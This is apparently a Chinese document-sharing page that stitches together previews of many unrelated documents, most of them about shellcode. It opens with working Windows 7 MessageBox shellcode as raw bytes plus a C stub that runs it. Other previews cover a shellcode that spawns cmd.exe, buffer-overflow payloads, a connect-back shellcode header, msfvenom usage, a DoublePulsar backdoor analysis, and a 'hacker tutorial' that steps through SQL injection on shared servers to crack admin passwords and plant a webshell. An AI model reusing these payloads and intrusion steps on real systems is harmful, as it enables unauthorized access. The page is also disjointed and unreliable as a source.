当前位置：文档库 › WIN7弹窗消息SHELLCODE

WIN7弹窗消息SHELLCODE

MessageBoxA(NULL,"ME","YUM",0);

下面这个可以真正弹MSGBOX,就是调用上面的。WIN 7下实测完全没问题

char shellcode[] =

"\x31\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53" "\x3C\x01\xDA\x8B\x52\x78\x01\xDA\x8B\x72\x20\x01\xDE\x31\xC9\x41\xAD\x01\xD8\x81" "\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64" "\x64\x72\x65\x75\xE2\x8B\x72\x24\x01\xDE\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x01\xDE" "\x8B\x14\x8E\x01\xDA\x31\xC9\x53\x52\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62\x72" "\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x31\xC0\x66\xB8\x6C\x6C" "\x50\x68\x33\x32\x2E\x64\x68\x75\x73\x65\x72\x54\xFF\x54\x24\x10\x83\xC4\x0C\x50" "\x31\xC0\xB8\x6F\x78\x41\x23\x50\x83\x6C\x24\x03\x23\x68\x61\x67\x65\x42\x68\x4D" "\x65\x73\x73\x54\xFF\x74\x24\x10\xFF\x54\x24\x1C\x83\xC4\x0C\x50\x31\xC0\x66\xB8" "\x4D\x45\x50\x54\x31\xC0\xB8\x59\x55\x4D\x23\x50\x83\x6C\x24\x03\x23\x54\x31\xC0" "\x50\xFF\x74\x24\x04\xFF\x74\x24\x10\x31\xC0\x50\xFF\x54\x24\x20\x83\xC4\x10";

((void (_stdcall*)())&shellcode)();//USE THIS ONE IS OK

int main(int argc, char **argv)

{

_asm

{

lea eax,shellcode

call eax

}

说点shellcode

代码艺术，艺术，不得不让我想起shellcode，所以打算简单连载下shellcode的编写。语言：c 编译环境： VC6.0 操作系统： windows XP 其实是win7虚拟机下跑的xp 看下面一个简单的程序 ,弹黑框程序 1.#include "windows.h" 2.#include "stdio.h" 3.int main() 4.{ 5.LoadLibrary("msvcrt.dll"); 6.system("cmd.exe"); 7.return 1; 8.} 因为system函数在msvcrt库中，所以在调用system函数前先加载该库。那怎写一段shellcode实现上面弹框的功能呢？一般两种方式，一是利用汇编实现上述功能，然后提取出二进制指令代码。另一种就是利用内联汇编（在c程序中嵌入汇编代码），然后提取，如下利用内联汇编实现弹框代码（笔者比较喜欢此种方式）1.#include "windows.h" 2. 3.int main() 4.{ 5.__asm 6.{ 7.call _LoadLibrary 8._emit 'm' 9._emit 's'

10._emit 'v' 11._emit 'c' 12._emit 'r' 13._emit 't' 14._emit '.' 15._emit 'd' 16._emit 'l' 17._emit 'l' 18._emit 0 //字符串结束标志 19._LoadLibrary: 20.mov eax，0x7c801d7b 21.call eax 22. 23.call _system 24._emit 'c' 25._emit 'm' 26._emit 'd' 27._emit '.' 28._emit 'e' 29._emit 'x' 30._emit 'e' 31._emit 0 32._system: 33.mov eax， 0x77bf93c7 34.call eax 35.} 36.return 1; 37.} 复制代码运行此程序，即弹出cmd命令框(当然将system函数的参数改下，也可以弹出计算器，有兴趣的可以试下)，如下：那这段代码是如何实现弹出cmd命令框的呢？写过c程序的人应该知道c中函数调用时参数由右到左逐个入栈的，参数入栈完毕后（这两个函数都只有一个参数），执行call指令，跳到要执行的函数处。 _emit伪指令的作用便是通知编译器直接在二进制文件中加入一个字符，以LoadlLibrary函数而言，参数为msvcrt.dll，将参数的所有字符逐个加到文件中，而前面一句call指令完成两个功能，一

Shellcode的原理及编写

1.shellcode原理 Shellcode实际是一段代码（也可以是填充数据），是用来发送到服务器利用特定漏洞的代码，一般可以获取权限。另外，Shellcode一般是作为数据发送给受攻击服务的。Shellcode 是溢出程序和蠕虫病毒的核心，提到它自然就会和漏洞联想在一起，毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数以万计带着漏洞顽强运行着的服务器给hacker和Vxer丰盛的晚餐。漏洞利用中最关键的是Shellcode的编写。由于漏洞发现者在漏洞发现之初并不会给出完整Shellcode，因此掌握Shellcode编写技术就显得尤为重要。如下链接是shellcode编写的基础，仅供参考 https://www.wendangku.net/doc/aa18673677.html,/uid-24917554-id-3506660.html 缓冲区溢出的shellcode很多了，这里重现下缓冲区溢出。 [cpp]view plaincopy 1.int fun(char *shellcode) 2.{ 3.char str[4]="";//这里定义4个字节 4. strcpy(str,shellcode);//这两个shellcode如果超过4个字节，就会导致缓冲区溢出 5. printf("%s",str); 6.return 1; 7.} 8.int main(int argc, char* argv[]) 9.{ 10.char str[]="aaaaaaaaaaaaaaaaaaa!"; 11. fun(str); 12.return 0; 13.} 如上程序，会导致缓冲区溢出。程序运行后截图如下

Shellcode指南

Shellcode 目录 1: 概述和工具 (1) 1.1 概述 (1) 1.2 Windows与Linux的Shellcode 有什么不同？ (2) 1.3 建立环境 (2) 1.4 其他工具 (4) 1.4.1 Metasploit (4) 1.4.2 OllyDbg 1.10 (4) 1.4.3 lcc-win32 (4) 2. 我的第一个shellcode (4) 2.1 说明 (4) 2.2 怎样从windows DLL里发现要使用的函数地址 (5) 2.3 汇编代码 (6) 2.4 编译汇编代码 (7) 2.5 获取shellcode (7) 2.6 测试shellcode (8) 3. 怎么在汇编里使用字符串 (9) 4. 函数Hash表 (10) 4.1 概述 (10) 4.2 目标 (10) 4.3 使用OllyDbg运行分析shellcode (14) 5. 动态Shellcode (18) 5.1 目标 (18) 5.2 建立函数Hash表 (18) 1: 概述和工具 1.1 概述 The assembly tutorials contained within this site are aimed towards creating assembly code in the aim to get you ready to create your own assembly and shellcode - which would hopefully be included with the "Project Shellcode Development Framework".

内核级后门“DoublePulsar”分析报告

内核级后门“DoublePulsar”分析报告在Shadow Brokers组织泄露的NSA方程式工具中，DoublePulsar是一个无文件型的内核后门程序。值得注意的是，DoublePulsar同时使用了终端和网络的高级逃逸技术。首先它是一个无文件型的内核级别后门，被控制端的主机防护软件通常无法有效检测；其次它与被控制端的通讯使用正常协议进行伪装（SMB或者RDP协议），可逃逸常见的网络防护产品。具体地，某些漏洞工具（EternalBlue、EternalRomance等）攻击成功后会篡改srv.sys 中SrvTransaction2DispatchTable表的第14项指针，从而在srv.sys中安装一个后门。而原始的SrvTransaction2DispatchTable表第14项指针指向的是SrvTransactionNotImplemented函数，在处理SMB协议的SMB_COM_TRANSACTION2消息时，会使用到该函数。这样DoublePulsar就可以与被控制机器通过特定的 SMB_COM_TRANSACTION2消息建立隐蔽信道，并执行相应攻击操作。技术分析 1.在后门被成功安装前，查看SrvTransaction2DispatchTable表，可以发现该表第14项指向的为SrvTransactionNotImplemented函数。 2.后门安装成功后，SrvTransaction2DispatchTable表中的第14项便被修改。

修改后的函数如下： 3.DoublePulsar主要有以下几个功能： 4.以上功能在代码中都对应不同的处理方法，主要处理流程如下：

利用hash值取得函数地址的connect back shellcode

主页安全文档安全工具安全漏洞漏洞利用红盟作品开放项目红盟社区关于我们递交作品作品总数: 38 个本类作品: 19 个关键字所有分类搜索快速通道软件作品文档作品代码作品 <= 文档分类 Windows RPC DCOM DoS exploit Serv-U FTPD 2.x/3.x/4.x/5.x "MDTM" Command Rem... Mysql 3.23.x/ 4.0.x remote exploit download url file shellcode for win2k/xp 利用hash 值取得函数地址的connect back shellcode. 分析理解 elf 文件并且自动编排 shellcode 的程序推荐作品提交作品： lion 提交日期： 2003-09-17 作品属性：推荐文档类别：代码作品浏览次数：今9次/总6234次 /****************************************************************** 作者: lion, lion@https://www.wendangku.net/doc/aa18673677.html, 日期: 2003-09-17 网站: https://www.wendangku.net/doc/aa18673677.html, 此shellcode 特点: a. 通过peb 取得kernel32.dll 地址 b. 通过函数的hash 值来进行比较,代替GetProcAddress 取得函数地址 c. 反连接功能 d. win2000/xp 测试成功参考资料: https://www.wendangku.net/doc/aa18673677.html,/documents/winasm-1.0.1.pdf https://www.wendangku.net/doc/aa18673677.html,/sc/win32_reverse.asm ******************************************************************* #include #include //#include //#pragma comment(lib, "ws2_32") void shellcode(); void printsc(unsigned char *sc, int len); DWORD addr; unsigned char hash[0x300] = {0}; unsigned char sc[0x1000]; // 要打印hash 的函数列表 unsigned char buff[]= "LoadLibraryA\x0" 利用hash 值取得函数地址的connect back shellcode.

msfvenom教程

Msfvenom 简介相信很多人升级最新的msf后找不到自己曾经熟悉的msfpayload了（所以说喜欢收集shellcode是一件好事），没错我特么的也找不到了。其实可以use到自己要使用的payload，然后制作。但是也有人喜欢直接在终端里生产自己的shellcode。另外我想也找不到msfencode 了，msfencode是shellcode的编码器，准确的来讲如果你自己编写一个shellcode并不怎么需要一个编码器，杀软杀掉的概率不大，即使是msf生成的shellcode也很大概率不被杀掉（也许我没用啥杀软）所以以前我也觉得编码器并不一定用得到。我经常理论的思考问题，而不会实际的搞破坏，所以直到后来我才直到编码器的重要，因为msf生成的shellcode经常是无法使用的！！需要编码器进行处理，这个处理包括加壳，过滤坏字符，迭代编译，甚至是控制字符串大小。当然编码器也有其他的功能。先说说payload和encode的关系，不然我想有些人会感到困惑，msf中payload模块是用来制作shellcode，也即是大家理解的用来搞破坏的机器码，对于没有汇编基础的人，几乎很难写出一个实用的shellcode，以前我也无奈，感觉被拒绝在安全大门之外了，好在有msfpayload,成全了一颗爱捣蛋的心。当然我也在一直学习着呢！我相信非常多的人甚至都不知道shellcode在栈中是怎么工作的，但是却已经可以利用shellcode搞破坏了。我希望不要这样。我不喜欢这种容易获得又有巨大危险性的技术掌握在一个不能自控的人手里。比如前一阵子的Hacking team泄露事件中的flash0day，直接装一个msf产生的shellcode就可以使用了，而根本不需要对漏洞原理或者shellcode原理懂太多。有点说多了，encode 是编码器，也是为payload设计的，因为杀软会根据shellcode的特征进行杀毒，因此我们需要encode给payload加壳，这里的理论知识和软件免杀原理相同，不过现在杀软有沙箱功能了，在内存阶段从行为判定进行查杀，所以有些shellcode 可能用编码器怎么编码也完蛋了，当然我胡乱吹的，因为我没有尝试过，有那时间我还不如去做饭。总的来说msfvenom 结合了payload 和encode的功能。经过这两个模块生成的shellcode，要装在的exp中来使用才行，就像弹头安装在导弹上。下面说说具体的使用方式中文翻译大概是这样（我从网上找的）： Options: -p,--payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload，请使用�

程序安全之作业

程序安全之作业一、获取文件overflow.zip,提取Windows可执行文件 1、利用缓冲区溢出，绕过序列号检查 2、正确的序列号二、如何有效的防范缓冲区溢出根据缓冲区溢出攻击的步骤，可将常用的缓冲区溢出攻击检测技术分为以下3种类型：基于输入字符串的检测方法，基于保护堆栈中的返回地址的检测方法和基于监视系统调用的检测方法。 1、基于输入字符串的检测方法对输入的字符串进行检测，确定其为溢出攻击字符串时采取阻拦措施，使攻击者无法注入攻击代码。一般有以下3种方法构建溢出攻击字符串。分别如下图4-1，图4-2，图4-3所示：

图4-1缓冲区大于ShellCode长度图4-2缓冲区小于ShellCode长度图4-3将ShellCode放在环境变量里第1种溢出攻击字符串适用于缓冲区大于ShellCode长度的情况；第2种溢出攻击字符串一般用于缓冲区小于ShellCode长度的情况；第3种方法是将ShellCode放在环境变量里，是目前较为常用的方法。在第1种和第2种类型的溢出攻击字符串中ShellCode前都加了若干的NOP指令，因为这2种情况下ShellCode的地址无法确定，但只要返回地址指向ShellCode前的任一条NOP指令，ShellCode就可以执行，大大增加了ShellCode执行的可能性。这些NOP指令称为sledge。其他单字节指令如AAA等也可构成sledge。因此缓冲区溢出攻击检测系统可以通过检查输入的字符串中是否含有大量NOP等可构成sledge的指令来判断此字符串是否是溢出攻击字符串。不过这种方法并不适用于检测第3种类型的攻击。但这3种类型的攻击字符串中都含有ShellCode。因此，确定出ShellCode的基本特征,如不含有“0x00”，含有某些特殊的系统调用等，然后利用人工智能、模式匹配、规则匹配等方法检查输入字符串中是否包含ShellCode也可检测出是否有缓冲区溢出攻击发生。这些检测都可以在入侵检测等外围防御系统中实现，优点是实现较为简单，不会增加被保护系统的开销；缺点是漏报率较高，无法检测出无明显特征的溢出攻击字符串。

CTF中那些脑洞大开的编码和加密

CTF中那些脑洞大开的编码和加密 0x00 前言正文开始之前先闲扯几句吧，玩CTF的小伙伴也许会遇到类似这样的问题:表哥，你知道这是什么加密吗？其实CTF中脑洞密码题(非现代加密方式)一般都是各种古典密码的变形，一般出题者会对密文进行一些处理，但是会给留一些线索，所以写此文的目的是想给小伙伴做题时给一些参考，当然常在CTF里出现的编码也可以了解一下。本来是想尽快写出参考的文章，无奈期间被各种事情耽搁导致文章断断续续写了2个月，文章肯定有许多没有提及到，欢迎小伙伴补充，总之，希望对小伙伴们有帮助吧！最后欢迎小伙伴来[博客](https://https://www.wendangku.net/doc/aa18673677.html,/)玩耍:P(ps:由于写文章是用markdown，而论坛编辑器不支持markdown语法，虽然我已经尽力去调整对其字符，可是效果还是不尽人意，如果影响阅读理解可以去博客阅读:P) 0x01 目录常见编码: 1.ASCII编码 2.Base64/32/16编码 3.shellcode编码 4.Quoted-printable编码 5.XXencode编码 6.UUencode编码 7.URL编码 8.Unicode编码 9.Escape/Unescape编码 10.HTML实体编码 11.敲击码(Tap code) 12.莫尔斯电码(Morse Code) 13.编码的故事各种文本加密换位加密: 1.栅栏密码(Rail-fence Cipher) 2.曲路密码(Curve Cipher) 3.列移位密码(Columnar Transposition Cipher) 替换加密: 1.埃特巴什码(Atbash Cipher) 2.凯撒密码(Caesar Cipher)

打造自己的反汇编引擎——Intel指令编码学习报告

打造自己的反汇编引擎——Intel指令编码学习报告作者:egogg 时间: 2008-10-22,13:28 写在前面：学习Intel指令格式已经有近一个月了，本来想把整个反汇编引擎写完整之后再发布源代码和学习报告的，但是，最初的热情过后，剩下的就是辛苦劳动了，现在实在太累了，似乎有点写不下去的感觉了，所以我还是打算，边总结学习的过程，边完成整个反汇编引擎：一方面，希望论坛里对指令解码知识感兴趣的朋友，高手给些鼓励；另一方面，希望能和这些朋友们讨论程序中的bug，讨论整个反汇编引擎的架构（这个我会在后面的学习报告中详细说明我所了解的一些架构）。学习新的知识是一件很令人高兴和满足的事情，但是能和别人分享学习的经验，更令人快乐。学习指令编码格式的好处有很多，我在这里提一些吧：一、加深对指令的了解。并不是用汇编语言写出的程序速度就一定比其他高级语言快，或者说节省空间，现在大部分的编译器做得比一般的汇编语言初学者，甚至是有一定编程经验的人都好，对一些汇编指令有所了解后，可能利用这些指令写出符合特定条件的好的代码，不管是用在shellcode还是用在关键代码的性能优化方面都有好处。例如：Svin的教程中就有一个题目：用四个byte实现下列的算法：（opcode hack） IF ZF=1 inc eax ELSE mov al,40 再有，现在的高级语言因为执行效率的原因，一般都舍弃用leave和enter指令，然而这些指令有着空间的优势……等等，此外，学习了指令编码之后会对intel的寻址模式有一个更为深刻的了解。二、学习了指令编码可以软件保护中的很多技巧如花指令等有更深刻的了解。三、如果这些小的技巧实在是不值一提，那么如果想些一个虚拟机架构的话，就必须对这些指令有所了解。 …… 由于我是一个菜鸟，所以有很多说不清楚的地方，还希望高手指正，毕竟，讨论才是学习永恒的主题。本来打算，把这些学习报告发在新手区的，但是看到这个版块有一个专题，就发到这个地方了。很多高手可能想自己学习研究，我会提前把我找到的所有的资料都列在附件中。实验反汇编引擎介绍：（原代码下载：dasm.rar）引擎采用了最直观，当然也是最笨拙的方法，switch...case，代码虽然不够简练，但是执行效率和整体结构还是很清楚的，代码的解析和识别只剩下力气活了。反汇编引擎目前的进度：基本框架已经实现，能解析的指令大约200多条，2-byte的指令还不能解析，浮点指令和mmx指令的解析都还待完成。

7.Windows Shellcode

7 Windows Shellcode 本书一位作者的女友经常说写shellcode很容易，凭心而论，在Linux上是不太难，但在Windows上还是有一定难度的，有时候会使人垂头丧气。在开始学习本章之前，我们将先回顾一些shellcode的要点，然后研究Windows shellcode那令人着迷的特性。沿着这条主线，我们还将讨论A T&T与Intel句法间的不同，某些Win32漏洞给我们带来的影响，并探讨高级Windows shellcode的发展方向。句法和过滤器首先，不使用编码器/译码器又能工作，而体积又很小的windows Shellcode少之又少。无论如何，如果有许多破解代码需要你去完成，你可能会想到在破解代码中采用编码器/译码器API来避免经常调整shellcode。例如Immunity CANV AS就使用了“附加的”编码器/译码器。也就是说，它把shellcode视为一组unsigned long列表，把列表中的每个unsigned long 加上x（x可以通过不断重试随机数来找到），经过这样的，会得到一组新的没有坏字符的unsigned long列表。虽然编码器/译码器工作得很好，但还是有人乐意使用XOR、character-或word-based之类的方法。重要的是：应该牢记译码器只是把x扩展到不同字符范围的y=f(x)函数。如果x仅仅包含小写字母，那么可以把f(x) 看作是把小写字母转换成二进制字符并转到那里的函数；当然，也可以把f(x) 看作是把小字字母转换成大字字母并转到那里的函数。换句话说，当你遇到设置严密的过滤器（译注：现在有很多程序在接受用户输入时，会过滤一些恶意字符）时，不要急于一次解决所有的问题，尝试使用多重解码，把攻击串分段转换为二进制等方法，可能会更容易些。在本章，我们不介绍编码器/译码器，并假设你知道怎样把二进制数据复制到进程空间并跳到它。只要你会写Linux shellcode，就应该能编写x86汇编代码。我写windows shellcode 和写Linux shellcode一样，使用相同的工具。从长远来看，熟练掌握几种工具会使编写shellcode变得更轻松。依我之见，不必花大把的钞票购买Visual Studio，免费的Cygwin （https://www.wendangku.net/doc/aa18673677.html,）就不错。安装Cygwin可能有点慢，所以你可以试着运行某个程序（gcc，as，或其它），来确认安装是否完成。当然，有些人喜欢用NASM或其它的工具，但我认为这些工具在编辑代码及测试时略有不便。 X86 A T&T 与Intel 句法的对比在X86汇编代码格式里，A T&T与Intel句法有两个主要的不同点。第一个是A T&T句法使用[助记符source，dest]；而Intel使用[助记符dest，source]。当人们用GUN的gas（A T&T 使用），OllyDbg（Intel 使用）或其它的Windows工具查看汇编代码时，这种互相颠倒的形

【IT专家】使用缓冲区溢出来执行shell代码

本文由我司收集整编，推荐下载，如有疑问，请与我司联系使用缓冲区溢出来执行shell 代码使用缓冲区溢出来执行shell 代码[英]Using buffer overflow to execute shell code I’ve been learning computer security lately and come across a couple problems, and i’m having some trouble with this one in particular. 我最近一直在学习计算机安全并遇到一些问题，特别是我遇到了这个问题。 I’m given a function with a fixed buffer I need to overflow in order to execute shellcode in the file shellcode. The function is quite simple: 我给了一个带有固定缓冲区的函数，我需要溢出才能在文件shellcode 中执行shellcode。功能很简单： void vuln(char *str) { char buf[64]; strcpy(buf, str); //function provided to display stack on command prompt dump_stack((void **) buf, 21, (void **) str); My initial guess was to modify the return address, the eip, of the function in order to locate and execute what is in the shellcode file, but i realized I have no address to the file I can represent in a hexadecimal value. I am pretty sure I need to manipulate the return address, so currently what i’m calling is: 我最初的猜测是修改函数的返回地址，eip，以便找到并执行shellcode 文件中的内容，但我意识到我没有地址到我可以用十六进制值表示的文件。我很确定我需要操纵返回地址，因此我目前正在调用的是： //the string is passed as a command line arg./buffer_overflow_shellcode $(python -c “print‘A’*72 + ‘\x41\xd6\xff\xff’“) my output is: 我的输出是： Stack dump:0xffffd600: 0xffffd7fd (first argument)0xffffd5fc: 0x08048653 (saved eip)0xffffd5f8: 0xffffd641 (saved ebp)0xffffd5f4: 0x414141410xffffd5f0: 0x414141410xffffd5ec: 0x414141410xffffd5e8: 0x414141410xffffd5e4: 0x414141410xffffd5e0: 0x414141410xffffd5dc: 0x414141410xffffd5d8: 0x414141410xffffd5d4: 0x414141410xffffd5d0: 0x414141410xffffd5cc:

黑客高级教程

黑客高级教程[怎么样入侵一个网站] [转贴2006-11-04 13:12:57] 字号：大中小到一年岁末时，回首全年，在2005年里黑客圈出现了许多新的攻击技术，也发布了许多黑客攻击利器，想知道2005年哪种攻击方式最流行，哪个黑软最凶猛，哪个漏洞最危险，那就看看这篇文章吧！一、最流行的网站入侵手法——“旁注” 在2005年网站入侵攻击中，注入技术依然是首选，不过更注重攻击中“发展思维”的黑客们，将“旁注”的威力发挥到了极限，使得一个又一个的网站被攻击关闭………… 1.“旁注”简介 “旁注”，顾名思义就是从旁注入，也就是当入侵攻击某个目标网站A时，在无直接利用该主机系统的漏洞进行攻击的情况下，可以考虑通过放在同一服务器上的网站B中存在的漏洞进行入侵（如图1所示，通过网站“whois.w https://www.wendangku.net/doc/aa18673677.html,”可查询到位于同一服务器上的其它网站）。 2.“旁注”已入寻常黑客家以往的旁注攻击由于过程比较麻烦，因此旁注并没有被众多普通的黑客所掌握。不过2005年中，一些傻瓜化的黑客工具被开发出来，旁注也开始流行与推广开来。步骤一：查询旁注网站运行旁注入侵工具“Domain v3.5”后，点击“旁注检测”选项卡，在“输入域名”中输入要入侵的网站地址“www.w https://www.wendangku.net/doc/aa18673677.html,”，点击右边的“>>”按钮，可得到该网站的IP地址。然后点击“查询”按钮，得到该IP地址对应服务器上所放置的所有网站域名列表（如图2）。 0 && image.height>0){if(image.w idth>=700){thi s.width=700;this.height=image.height*700/image.w idth;}}"> 步骤二：寻找注入点点击“SQL注入”选项卡，再点击界面中的“批量扫描注入点”按钮，切换到注入点扫描页面。点击页面中的“载入查询网址”按钮，即可将刚才得到的网址载入左侧的待扫描列表中。再点击“批量分析注入点”按钮，即可开始自动扫描所有网站中可能存在的注入点了（如图3）。 0 && image.height>0){if(image.w idth>=700){thi s.width=700;this.height=image.height*700/image.w idth;}}"> 由于要同时扫描多个网站中存在的注入点，可以适当的调节加大工作进程到30左右，以加快扫描速度。扫描过程中，待扫描的链接地址显示在“连接地址”中，存在注入漏洞的链接地址将会以红色显示在“注入点”列表中。可以看到总共扫描到了79个注入点。步骤三：注入攻击这里我们选择了列表中的第一个注入点，然后右键点击该条链接地址，在弹出菜单中选择“注入检测”命令，打开注入分析页面（如图4）。点击页面中的“开始检测”按钮，即可开始分析该注入点能否成功注入。分析结束后，在“检测信息”中显示可成功注入，并显示了数据库类型“Access”。继续依次点击界面中间“猜解表名”→“猜解列名”→“猜解内容”按钮，就可以自动分析猜解出数据库的管理员帐号和密码，并显示在右边的列表框中。步骤四：扫描后台点击页面中的“管理入口”按钮，切换到后台登录地址扫描界面。选择“从当前目录开始扫描”项，点击“扫描后台地址”按钮，得到后台登录地址（如图5）。右键点击该地址，选择“打开”命令，输入刚才猜解出来的管理员用户名和密码，就可以成功的登录后台上传Webshell木马控制整个服务器啦！ 0 && image.height>0){if(image.w idth>=700){thi s.width=700;this.height=image.height*700/image.w idth;}}"> Domain v3.5将旁注的几个繁琐步骤全部集成到了一个工具之中，使用起来极为方便。另外，在Domain v3.5中还集成了其它常见的网站入侵功能，包括暴库、上传漏洞利用、P HP注入、MD5密码破解等，功能极为强大。

WIN7弹窗消息SHELLCODE

MessageBoxA(NULL,"ME","YUM",0); 下面这个可以真正弹MSGBOX,就是调用上面的。WIN 7下实测完全没问题 char shellcode[] = "\x31\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53" "\x3C\x01\xDA\x8B\x52\x78\x01\xDA\x8B\x72\x20\x01\xDE\x31\xC9\x41\xAD\x01\xD8\x81" "\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64" "\x64\x72\x65\x75\xE2\x8B\x72\x24\x01\xDE\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x01\xDE" "\x8B\x14\x8E\x01\xDA\x31\xC9\x53\x52\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62\x72" "\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x31\xC0\x66\xB8\x6C\x6C" "\x50\x68\x33\x32\x2E\x64\x68\x75\x73\x65\x72\x54\xFF\x54\x24\x10\x83\xC4\x0C\x50" "\x31\xC0\xB8\x6F\x78\x41\x23\x50\x83\x6C\x24\x03\x23\x68\x61\x67\x65\x42\x68\x4D" "\x65\x73\x73\x54\xFF\x74\x24\x10\xFF\x54\x24\x1C\x83\xC4\x0C\x50\x31\xC0\x66\xB8" "\x4D\x45\x50\x54\x31\xC0\xB8\x59\x55\x4D\x23\x50\x83\x6C\x24\x03\x23\x54\x31\xC0" "\x50\xFF\x74\x24\x04\xFF\x74\x24\x10\x31\xC0\x50\xFF\x54\x24\x20\x83\xC4\x10"; ((void (_stdcall*)())&shellcode)();//USE THIS ONE IS OK int main(int argc, char **argv) { _asm { lea eax,shellcode call eax } }

技巧：一个 Shell 程序的性能优化

化级别: 中级许四化(vahala.sihua@https://www.wendangku.net/doc/aa18673677.html,), 新疆电信业务支撑中心 2006 年10 月30 日编写Linux Shell 脚本程序不要仅限于完成基本的程序功能，认真的分析Shell 脚本并找出优化的方法对个人能力的提高以及对脚本程序的质量改善都有重要的意义，希望读者能从本文中获得许多实用的Shell 程序方法。本文Shell 程序运行环境： ?程序运行环境Redhat Linux As3 ?GNU bash, version 2.05b.0(1)-release (i386-redhat-linux-gnu) ?代码清单：shellcode.txt 问题描述：有一个普通的通话话单文件(包括"计费号码"，"主叫号码"，"被叫号码"，"开始时间"，"结束时间"，"时长"，"费用"等其它字段)，要求根据另外一个号段配置文件(由"号段下限"和"号段上限"两个字段组成)将此话单文件进行分拣过虑。分拣规则：如果通话话单文件中的"计费号码"位于号段文件的某个号段内，则将此条记录计入结果文件1，否则计入结果文件2。通话话单文件样例：号段配置文件样例：

例如：对于通话话单文件的第一条记录中的"计费号码"为9013320000，此号码正好属于号段配置文件的第一个号段9013305000,9013327999中，即：条件9013305000<= 9013320000 <=9013327999 成立，所以应该将通话话单文件的第一条记录计入结果文件 1 中；对于通话话单文件中的第二条记录的"计费号码"为9926645208 它不属于号段文件中的任何一个段，所以应该将通话话单的第二条记录计入结果文件 2 中。对于这样一个简单的问题首先想到的解决方法为：解决方法1：写一个双重循环，外层循环为逐条读取"通话话单文件"并获取每条记录的第一个字段的值"计费号码"，内层循环：根据外层循环获得的"计费号码"在"号段文件"中循环比较，判断此号码是否属于相应号段。程序代码如下(省略了文件存在性判断等语句)： while read f do org="$(expr substr ${f} 1 10)" #取得"计费号码"存入变量org中 while read numseg do nglow="$(expr substr ${numseg} 1 10 )" #将号段下限存入变量nglow ngtop="$(expr substr ${numseg} 12 10 )" #将号段上限存入变量ngtop if [ "$org" \> "$nglow" -a "$org" \< $ngtop ] #判断"计费号码"是否在此号段内 then echo "${f}" >> ./resultfile1.cdr #如果在此号段内，将此记录计入结果文件1中 else echo "${f}" >> ./resultfile2.cdr #如果不在此号段内，将此记录计入结果文件2中 fi done < ./numseg.txt done < ./rttest.txt 解决方法1 对于号段文件和通话话单的记录数都比较少的情况下基本可以完成工作，但是当两个文件的记录数较多(例如号段文件>50条，话单文件>10000条)的时候，这种方法就会花费几个小时甚至几天的时间才能得出处理结果。此脚本程序执行慢的原因是对第二个循环内的比较运算只用了最简单的顺序比较方法，所以当号段文件的记录增多的时候，脚本的执行速度会急剧下降。解决方法2：将内层循环的逐个比较的方法改为二分查找法进行判断，程序代码如下：